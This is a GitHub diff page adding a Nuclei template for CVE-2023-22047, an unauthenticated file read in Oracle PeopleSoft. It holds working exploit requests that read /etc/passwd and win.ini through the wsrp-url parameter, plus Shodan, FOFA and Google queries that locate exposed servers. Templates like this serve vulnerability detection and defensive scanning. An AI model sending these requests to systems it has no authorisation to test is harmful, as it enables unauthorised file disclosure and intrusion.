Skip to content
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
51 changes: 51 additions & 0 deletions http/cves/2023/CVE-2023-22047.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,51 @@
id: CVE-2023-22047

info:
name: Oracle Peoplesoft - Unauthenticated File Read
author: tuo4n8
severity: high
description: |
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component- Portal). Supported versions that are affected are 8.59 and 8.60. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise PeopleTools accessible data.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-22047
- https://x.com/tuo4n8/status/1907279143517266286
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-22047
epss-score: 0.00635
epss-percentile: 0.68045
cpe: cpe:2.3:a:oracle:peoplesoft_enterprise:8.59:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: oracle
product: peoplesoft_enterprise
shodan-query: http.title:"oracle peoplesoft enterprise"
fofa-query: title="oracle peoplesoft enterprise"
google-query: intitle:"oracle peoplesoft enterprise"
tags: cve,cve2023,oracle,peoplesoft,lfi

http:
- method: GET
path:
- "{{BaseURL}}/RP?wsrp-url=file:///etc/passwd"
- "{{BaseURL}}/RP?wsrp-url=file:///c:\\windows\\win.ini"

stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- "bit app support"
condition: or

- type: word
part: content_type
words:
- "content/unknown"

- type: status
status:
- 200